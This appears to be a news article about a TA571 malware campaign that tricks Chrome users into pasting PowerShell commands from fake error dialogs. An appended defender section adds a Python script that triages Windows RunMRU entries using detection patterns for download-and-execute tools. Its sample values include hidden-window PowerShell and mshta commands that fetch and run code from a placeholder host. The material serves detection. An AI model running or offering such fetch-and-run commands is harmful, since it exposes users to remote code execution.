New malware in Google Chrome is activated by copying and pasting text


A seemingly harmless action like copying and pasting text could put your computer’s security at risk. A new type of cyber scam has recently been detected in which malware is distributed through Google Chrome and infects users when they execute malicious code hidden in copied text. This malware, which spreads mainly through PowerShell scripts, has put users and cybersecurity experts on alert.

Google Chrome, one of the most popular browsers, has been the means by which this malware reaches and infects users’ systems. The scam begins when the user, while browsing, comes across a fake error dialog suggesting that they copy and paste a specific text into PowerShell or the Windows “Run” dialog box.

This text, once executed, installs malware that disguises itself as a legitimate Windows process. Experts warn that the fake alert is convincing and could trick many users into following the instructions without suspecting the scam.

Consequences of malware infection

Once installed, the malware performs a check to determine whether the infected system is connected to a public or private network and, if conditions are suitable, proceeds to execute malicious activities in the background. These can range from installing other types of malware to capturing personal information and banking details.

The presence of malware is difficult to detect once it is operational, as it disguises itself as legitimate processes and can alter system behavior to evade antivirus software.

The TA571 group behind the attack

The group behind this new threat has been identified as TA571, known for its large-scale spam campaigns. They use a tool called ClearFake, which allows fake software updates to be created. Such fake updates are one of the most common ways cybercriminals spread their malicious tools.

Features of the TA571 Group:

1. Focus on malware and ransomware: TA571 has frequently been associated with the distribution of different types of malware, including ransomware and banking Trojans.

2. Phishing campaigns: One of the most common methods used by TA571 is the mass sending of phishing emails. These emails are often designed to look like legitimate communications from well-known companies or government entities, in order to persuade users to click on malicious links or open infected attachments.

3. Use of automation tools: The group is characterized by its use of automated tools that allow them to send large volumes of malicious emails quickly and efficiently, maximizing the reach of their campaigns and increasing the likelihood of success.

4. Adaptability and Evolution: TA571 constantly adapts its tactics and improves its tools to avoid detection by security software and to be effective against the latest technological defenses. They change their attack patterns and update their malware payloads to stay one step ahead of cyber defenders.

Detection strategies and measures to protect yourself

Not all users have sufficient technical training to recognize that these warnings are unusual and do not come from Windows. At first, most users might feel the urge to fix the problem immediately by following the instructions, which will unknowingly install the malware.

Cybersecurity specialists recommend being especially alert to any dialog box that asks for unusual actions such as copying and pasting commands into system tools. Ignoring these messages and closing the browser window could be the difference between maintaining a secure system and falling victim to a cyberattack.

Additionally, it is recommended that users perform regular scans with updated antivirus software and consider using browser extensions that block suspicious sites and downloads.
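
For defenders, an added example that is not part of the original article: because the scam relies on the user pasting a command into the Run dialog or PowerShell, pasted commands can be triaged after the fact. Windows keeps commands typed into the Run dialog in the per-user RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), each value ending in `\1`. The indicator patterns, function names and sample values below are assumptions constructed for illustration.

```python
import re

# Heuristic indicators chosen for this example (assumptions, not from the article).
INDICATORS = {
    "hidden_window": re.compile(r"-w[a-z]*\s+[\"']?hid", re.I),
    "encoded_command": re.compile(r"\s-e[a-z]*\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}
# Interpreters this example looks for at the start of a command (optionally with a path).
INTERPRETER = re.compile(
    r"^\s*\"?(?:[^\"\s]*\\)?(powershell|pwsh|cmd|mshta|wscript|cscript)(?:\.exe)?\b", re.I)

def normalize(value):
    """RunMRU stores each entry with a trailing '\\1'; strip it if present."""
    return value[:-2] if value.endswith("\\1") else value

def triage(command):
    """Return None for non-interpreter commands, else the indicators that matched."""
    cmd = normalize(command).strip()
    match = INTERPRETER.match(cmd)
    if not match:
        return None
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))
    return {"interpreter": match.group(1).lower(),
            "indicators": hits,
            "suspicious": bool(hits)}

def flagged(values):
    """Commands worth an analyst's attention, in their original order."""
    return [normalize(v) for v in values if (triage(v) or {}).get("suspicious")]

# Constructed sample RunMRU values (not real indicators; example.invalid never resolves).
SAMPLE_RUNMRU = [
    r"notepad\1",
    r"cmd\1",
    r'powershell -w hidden -c "iex (iwr https://example.invalid/fix.txt)"\1',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -enc '
    r"QQBBAEEAQQBBAEEAQQBBAEEA\1",
    r"mshta https://example.invalid/update.hta\1",
    r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1\1",
]

if __name__ == "__main__":
    for value in SAMPLE_RUNMRU:
        print(normalize(value), "->", triage(value))
```

The same `triage` function can be applied to command lines taken from process-creation logs; any hit is a lead for review, not proof of infection.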

 